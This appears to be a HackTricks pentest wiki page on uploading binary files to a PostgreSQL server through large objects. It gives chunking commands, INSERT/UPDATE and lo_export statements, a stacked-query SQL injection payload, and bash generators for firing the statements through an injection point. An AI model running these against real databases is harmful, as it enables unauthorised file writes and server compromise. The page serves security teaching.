# Big Binary Files Upload (PostgreSQL)

{% hint style="success" %}
Learn & practice AWS Hacking: <img src="/.gitbook/assets/arte.png" alt="" data-size="line"> [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte) <img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line"> [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) <img src="/.gitbook/assets/grte.png" alt="" data-size="line">
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### PostgreSQL Large Objects
PostgreSQL offers a structure known as **large objects**, accessible via the `pg_largeobject` table, designed for storing large data types such as images or PDF documents. Unlike the `COPY TO` function, this approach allows the **data to be exported back to the file system** as an exact binary replica of the original file.

To **store a complete file** in this table, an object must first be created in the `pg_largeobject` table (identified by a LOID), and the data then inserted into it in 2KB chunks. Each chunk must be exactly 2KB in size (with the possible exception of the last one) for the export function to work correctly.
To **divide your binary data** into 2KB chunks, the following commands can be executed:
```bash
split -b 2048 your_file # Creates 2KB sized files
```
For encoding each file into Base64 or Hex, the commands below can be used:
```bash
base64 -w 0 <Chunk_file> # Encodes to Base64 on a single line
xxd -p <Chunk_file> | tr -d '\n' # Encodes to hex on a single line (portable; xxd's -c flag caps the column width on many builds)
```
**Important**: When automating this process, make sure each chunk corresponds to exactly 2KB (2048 bytes) of raw data. Hex-encoded chunks therefore weigh 4KB each, since hex encoding doubles the size, while Base64-encoded chunks follow the formula `ceil(n / 3) * 4` (2732 bytes for a full 2048-byte chunk).
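As a quick sanity check before sending anything, the raw and encoded sizes of every chunk can be verified; this sketch assumes the default `xaa`, `xab`, ... names produced by `split`:
```bash
# Every chunk except the last should report raw=2048, b64=2732, hex=4096
for f in x??; do
  printf '%s: raw=%s b64=%s hex=%s\n' "$f" \
    "$(wc -c < "$f")" \
    "$(base64 -w 0 "$f" | wc -c)" \
    "$(xxd -p "$f" | tr -d '\n' | wc -c)"
done
```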
The contents of the large objects can be viewed for debugging purposes using:
```sql
select loid, pageno, encode(data, 'escape') from pg_largeobject;
```
#### Using `lo_creat` & Base64
To store binary data, a LOID is first created:
```sql
SELECT lo_creat(-1); -- Creates a new, empty large object
SELECT lo_create(173454); -- Attempts to create a large object with a specific OID
```
In situations requiring a predictable LOID, such as exploiting a blind SQL injection where the OID returned by `lo_creat` cannot be read back, `lo_create` with a fixed LOID is preferred.
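In a stacked-queries injection, that call can be smuggled into the vulnerable parameter; a purely illustrative sketch (the parameter value and LOID are placeholders):
```sql
-- Hypothetical stacked-query payload appended to an injectable numeric parameter
1; SELECT lo_create(173454)--
```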
Data chunks can then be inserted as follows:
```sql
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));
```
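Writing one `INSERT` per chunk by hand does not scale. A minimal generator sketch, assuming the default `xaa`, `xab`, ... chunk names produced by the `split` command above and the LOID `173454`:
```bash
loid=173454
pageno=0
for f in x??; do   # iterate over the split chunks in order
  b64=$(base64 -w 0 "$f")
  echo "INSERT INTO pg_largeobject (loid, pageno, data) VALUES ($loid, $pageno, decode('$b64', 'base64'));"
  pageno=$((pageno + 1))
done > inserts.sql
```
Each emitted statement can then be fired through the injection point one at a time.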
To export and potentially delete the large object after use:
```sql
SELECT lo_export(173454, '/tmp/your_file');
SELECT lo_unlink(173454); -- Deletes the specified large object
```
#### Using `lo_import` & Hex
The `lo_import` function creates a large object from a file on the database server's file system; the optional second argument sets the LOID (note that these server-side functions are typically restricted to superusers or roles explicitly granted the required privileges):
```sql
select lo_import('/path/to/file');
select lo_import('/path/to/file', 173454);
```
Once the object exists, its data is overwritten page by page, each chunk being exactly 2KB (except possibly the last). Note that `UPDATE` only touches pages that already exist, so the imported file must span at least as many pages as the payload:
```sql
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;
```
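The same generator idea works for the hex variant (again assuming the `split` chunk names and LOID `173454`):
```bash
loid=173454
pageno=0
for f in x??; do   # emit one UPDATE per existing 2KB page
  hex=$(xxd -p "$f" | tr -d '\n')
  echo "UPDATE pg_largeobject SET data=decode('$hex', 'hex') WHERE loid=$loid AND pageno=$pageno;"
  pageno=$((pageno + 1))
done > updates.sql
```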
To complete the process, the data is exported and the large object is deleted:
```sql
select lo_export(173454, '/path/to/your_file');
select lo_unlink(173454); -- Deletes the specified large object
```
### Limitations
Note that **large objects can have ACLs** (Access Control Lists, supported since PostgreSQL 9.0), which may restrict access even to objects created by your own user. However, older objects created with permissive ACLs may still be readable, allowing their content to be exfiltrated.
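To see which large objects exist and what their owners and ACLs are, the metadata catalog can be queried:
```sql
select oid, lomowner, lomacl from pg_largeobject_metadata;
```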
{% hint style="success" %}
Learn & practice AWS Hacking: <img src="/.gitbook/assets/arte.png" alt="" data-size="line"> [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte) <img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line"> [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) <img src="/.gitbook/assets/grte.png" alt="" data-size="line">
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}